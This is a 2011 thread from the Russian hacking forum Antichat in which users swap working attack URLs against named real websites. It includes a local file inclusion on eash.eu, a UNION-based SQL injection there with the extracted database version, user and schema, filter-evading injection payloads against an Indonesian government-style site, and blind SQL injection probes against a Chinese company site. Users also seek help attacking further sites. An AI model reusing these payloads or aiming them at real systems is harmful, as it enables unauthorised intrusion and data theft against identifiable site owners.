
12.12.2011, 01:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от None
Include /etc/apache2/vhosts.d/*.conf
Как-бы намекает.
|
|
|

12.12.2011, 02:49
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от ~EviL~
Вот нашел уязвимость:
Код:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
А дальше можно как-то развить ее?
LFI, но похоже, что из директории не выпускает.
http://www.eash.eu/phpmyadmin/print.css- файл есть
http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет
Можно почитать файлы, к которым нет доступа через сайт:
http://www.eash.eu/openletter2011/index.php?file=.htaccess
Использовать для XSS:
http://www.eash.eu/openletter2011/index.php?file=
Или просто найти другой баг на сайте, как было написано выше =)
Код:
http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20+--+
5.1.49-3:eash_live@localhost:eash_live
Кавычки не фильтруются и не экранируются
|
|
|

12.12.2011, 04:04
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Код:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+
Can't get vuln number?
|
|
|

12.12.2011, 04:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от lightangel
Код:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+
Can't get vuln number?
http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+
|
|
|

12.12.2011, 18:21
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Is this site vulnerable?
Код:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0
Nothing yet works on it.
|
|
|

12.12.2011, 21:45
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от lightangel
Is this site vulnerable?
Код:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0
Nothing yet works on it.
Yes. Its vulnerable
Код:
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=5 TRUE
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)=4 FALSE
|
|
|

13.12.2011, 00:51
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Thank you, I thought as much; Blind SQL Injection.
I'll have my take on it.
|
|
|

13.12.2011, 09:55
|
|
Участник форума
Регистрация: 17.08.2011
Сообщений: 131
С нами:
7756886
Репутация:
0
|
|
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...
|
|
|

13.12.2011, 13:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от infoseller
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...
Имхо это обычный заголовок, вставляемый в TITLE страницы. Ничего другого без указания линка на ум не идёт...
|
|
|

13.12.2011, 16:46
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|